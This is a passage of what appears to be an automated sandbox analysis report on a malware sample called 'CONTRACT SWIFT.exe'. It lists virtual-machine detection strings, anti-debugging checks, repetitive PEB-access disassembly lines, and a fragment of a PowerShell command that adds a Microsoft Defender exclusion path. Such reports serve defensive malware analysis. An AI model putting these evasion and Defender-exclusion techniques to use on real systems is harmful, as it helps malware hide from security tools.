Source: explorer.exe, 00000006.00000000.344194372.00000000063F6000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.347366887.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000006.00000000.347639118.0000000008540000.00000004.00000001.sdmp	Binary or memory string: 00000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&-
Source: explorer.exe, 00000006.00000000.346787938.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000006.00000000.367994531.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000006.00000000.347661786.0000000008551000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
Source: explorer.exe, 00000006.00000000.346787938.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000006.00000000.347425535.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000006.00000000.330881685.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 00000006.00000000.367994531.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_004088B0 rdtsc

5_2_004088B0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_00409B20 LdrLoadDll,

5_2_00409B20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB944 mov eax, dword ptr fs:[00000030h]	5_2_015FB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB944 mov eax, dword ptr fs:[00000030h]	5_2_015FB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015DB171 mov eax, dword ptr fs:[00000030h]	5_2_015DB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015DB171 mov eax, dword ptr fs:[00000030h]	5_2_015DB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015DC962 mov eax, dword ptr fs:[00000030h]	5_2_015DC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160513A mov eax, dword ptr fs:[00000030h]	5_2_0160513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160513A mov eax, dword ptr fs:[00000030h]	5_2_0160513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D9100 mov eax, dword ptr fs:[00000030h]	5_2_015D9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D9100 mov eax, dword ptr fs:[00000030h]	5_2_015D9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D9100 mov eax, dword ptr fs:[00000030h]	5_2_015D9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F4120 mov eax, dword ptr fs:[00000030h]	5_2_015F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F4120 mov eax, dword ptr fs:[00000030h]	5_2_015F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F4120 mov eax, dword ptr fs:[00000030h]	5_2_015F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F4120 mov eax, dword ptr fs:[00000030h]	5_2_015F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F4120 mov ecx, dword ptr fs:[00000030h]	5_2_015F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016641E8 mov eax, dword ptr fs:[00000030h]	5_2_016641E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015DB1E1 mov eax, dword ptr fs:[00000030h]	5_2_015DB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015DB1E1 mov eax, dword ptr fs:[00000030h]	5_2_015DB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015DB1E1 mov eax, dword ptr fs:[00000030h]	5_2_015DB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016061A0 mov eax, dword ptr fs:[00000030h]	5_2_016061A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016061A0 mov eax, dword ptr fs:[00000030h]	5_2_016061A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016569A6 mov eax, dword ptr fs:[00000030h]	5_2_016569A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016949A4 mov eax, dword ptr fs:[00000030h]	5_2_016949A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016949A4 mov eax, dword ptr fs:[00000030h]	5_2_016949A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016949A4 mov eax, dword ptr fs:[00000030h]	5_2_016949A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016949A4 mov eax, dword ptr fs:[00000030h]	5_2_016949A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016551BE mov eax, dword ptr fs:[00000030h]	5_2_016551BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016551BE mov eax, dword ptr fs:[00000030h]	5_2_016551BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016551BE mov eax, dword ptr fs:[00000030h]	5_2_016551BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016551BE mov eax, dword ptr fs:[00000030h]	5_2_016551BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FC182 mov eax, dword ptr fs:[00000030h]	5_2_015FC182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F99BF mov ecx, dword ptr fs:[00000030h]	5_2_015F99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F99BF mov ecx, dword ptr fs:[00000030h]	5_2_015F99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F99BF mov eax, dword ptr fs:[00000030h]	5_2_015F99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F99BF mov ecx, dword ptr fs:[00000030h]	5_2_015F99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F99BF mov ecx, dword ptr fs:[00000030h]	5_2_015F99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F99BF mov eax, dword ptr fs:[00000030h]	5_2_015F99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F99BF mov ecx, dword ptr fs:[00000030h]	5_2_015F99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F99BF mov ecx, dword ptr fs:[00000030h]	5_2_015F99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F99BF mov eax, dword ptr fs:[00000030h]	5_2_015F99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F99BF mov ecx, dword ptr fs:[00000030h]	5_2_015F99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F99BF mov ecx, dword ptr fs:[00000030h]	5_2_015F99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F99BF mov eax, dword ptr fs:[00000030h]	5_2_015F99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160A185 mov eax, dword ptr fs:[00000030h]	5_2_0160A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01602990 mov eax, dword ptr fs:[00000030h]	5_2_01602990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F0050 mov eax, dword ptr fs:[00000030h]	5_2_015F0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F0050 mov eax, dword ptr fs:[00000030h]	5_2_015F0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01692073 mov eax, dword ptr fs:[00000030h]	5_2_01692073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A1074 mov eax, dword ptr fs:[00000030h]	5_2_016A1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160002D mov eax, dword ptr fs:[00000030h]	5_2_0160002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160002D mov eax, dword ptr fs:[00000030h]	5_2_0160002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160002D mov eax, dword ptr fs:[00000030h]	5_2_0160002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160002D mov eax, dword ptr fs:[00000030h]	5_2_0160002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160002D mov eax, dword ptr fs:[00000030h]	5_2_0160002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA830 mov eax, dword ptr fs:[00000030h]	5_2_015FA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA830 mov eax, dword ptr fs:[00000030h]	5_2_015FA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA830 mov eax, dword ptr fs:[00000030h]	5_2_015FA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA830 mov eax, dword ptr fs:[00000030h]	5_2_015FA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01657016 mov eax, dword ptr fs:[00000030h]	5_2_01657016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01657016 mov eax, dword ptr fs:[00000030h]	5_2_01657016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01657016 mov eax, dword ptr fs:[00000030h]	5_2_01657016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015EB02A mov eax, dword ptr fs:[00000030h]	5_2_015EB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015EB02A mov eax, dword ptr fs:[00000030h]	5_2_015EB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015EB02A mov eax, dword ptr fs:[00000030h]	5_2_015EB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015EB02A mov eax, dword ptr fs:[00000030h]	5_2_015EB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A4015 mov eax, dword ptr fs:[00000030h]	5_2_016A4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A4015 mov eax, dword ptr fs:[00000030h]	5_2_016A4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D58EC mov eax, dword ptr fs:[00000030h]	5_2_015D58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0166B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0166B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0166B8D0 mov ecx, dword ptr fs:[00000030h]	5_2_0166B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0166B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0166B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0166B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0166B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0166B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0166B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0166B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0166B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB8E4 mov eax, dword ptr fs:[00000030h]	5_2_015FB8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB8E4 mov eax, dword ptr fs:[00000030h]	5_2_015FB8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D40E1 mov eax, dword ptr fs:[00000030h]	5_2_015D40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D40E1 mov eax, dword ptr fs:[00000030h]	5_2_015D40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D40E1 mov eax, dword ptr fs:[00000030h]	5_2_015D40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016020A0 mov eax, dword ptr fs:[00000030h]	5_2_016020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016020A0 mov eax, dword ptr fs:[00000030h]	5_2_016020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016020A0 mov eax, dword ptr fs:[00000030h]	5_2_016020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016020A0 mov eax, dword ptr fs:[00000030h]	5_2_016020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016020A0 mov eax, dword ptr fs:[00000030h]	5_2_016020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016020A0 mov eax, dword ptr fs:[00000030h]	5_2_016020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016190AF mov eax, dword ptr fs:[00000030h]	5_2_016190AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D9080 mov eax, dword ptr fs:[00000030h]	5_2_015D9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160F0BF mov ecx, dword ptr fs:[00000030h]	5_2_0160F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160F0BF mov eax, dword ptr fs:[00000030h]	5_2_0160F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160F0BF mov eax, dword ptr fs:[00000030h]	5_2_0160F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01653884 mov eax, dword ptr fs:[00000030h]	5_2_01653884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01653884 mov eax, dword ptr fs:[00000030h]	5_2_01653884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015DF358 mov eax, dword ptr fs:[00000030h]	5_2_015DF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01603B7A mov eax, dword ptr fs:[00000030h]	5_2_01603B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01603B7A mov eax, dword ptr fs:[00000030h]	5_2_01603B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015DDB40 mov eax, dword ptr fs:[00000030h]	5_2_015DDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A8B58 mov eax, dword ptr fs:[00000030h]	5_2_016A8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015DDB60 mov ecx, dword ptr fs:[00000030h]	5_2_015DDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309 mov eax, dword ptr fs:[00000030h]	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0169131B mov eax, dword ptr fs:[00000030h]	5_2_0169131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016003E2 mov eax, dword ptr fs:[00000030h]	5_2_016003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016003E2 mov eax, dword ptr fs:[00000030h]	5_2_016003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016003E2 mov eax, dword ptr fs:[00000030h]	5_2_016003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016003E2 mov eax, dword ptr fs:[00000030h]	5_2_016003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016003E2 mov eax, dword ptr fs:[00000030h]	5_2_016003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016003E2 mov eax, dword ptr fs:[00000030h]	5_2_016003E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016823E3 mov ecx, dword ptr fs:[00000030h]	5_2_016823E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016823E3 mov ecx, dword ptr fs:[00000030h]	5_2_016823E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016823E3 mov eax, dword ptr fs:[00000030h]	5_2_016823E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016553CA mov eax, dword ptr fs:[00000030h]	5_2_016553CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016553CA mov eax, dword ptr fs:[00000030h]	5_2_016553CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FDBE9 mov eax, dword ptr fs:[00000030h]	5_2_015FDBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FEB9A mov eax, dword ptr fs:[00000030h]	5_2_015FEB9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FEB9A mov eax, dword ptr fs:[00000030h]	5_2_015FEB9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01604BAD mov eax, dword ptr fs:[00000030h]	5_2_01604BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01604BAD mov eax, dword ptr fs:[00000030h]	5_2_01604BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01604BAD mov eax, dword ptr fs:[00000030h]	5_2_01604BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A5BA5 mov eax, dword ptr fs:[00000030h]	5_2_016A5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E1B8F mov eax, dword ptr fs:[00000030h]	5_2_015E1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E1B8F mov eax, dword ptr fs:[00000030h]	5_2_015E1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0169138A mov eax, dword ptr fs:[00000030h]	5_2_0169138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0168D380 mov ecx, dword ptr fs:[00000030h]	5_2_0168D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160138B mov eax, dword ptr fs:[00000030h]	5_2_0160138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160138B mov eax, dword ptr fs:[00000030h]	5_2_0160138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160138B mov eax, dword ptr fs:[00000030h]	5_2_0160138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160B390 mov eax, dword ptr fs:[00000030h]	5_2_0160B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01602397 mov eax, dword ptr fs:[00000030h]	5_2_01602397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0168B260 mov eax, dword ptr fs:[00000030h]	5_2_0168B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0168B260 mov eax, dword ptr fs:[00000030h]	5_2_0168B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A8A62 mov eax, dword ptr fs:[00000030h]	5_2_016A8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0161927A mov eax, dword ptr fs:[00000030h]	5_2_0161927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D9240 mov eax, dword ptr fs:[00000030h]	5_2_015D9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D9240 mov eax, dword ptr fs:[00000030h]	5_2_015D9240
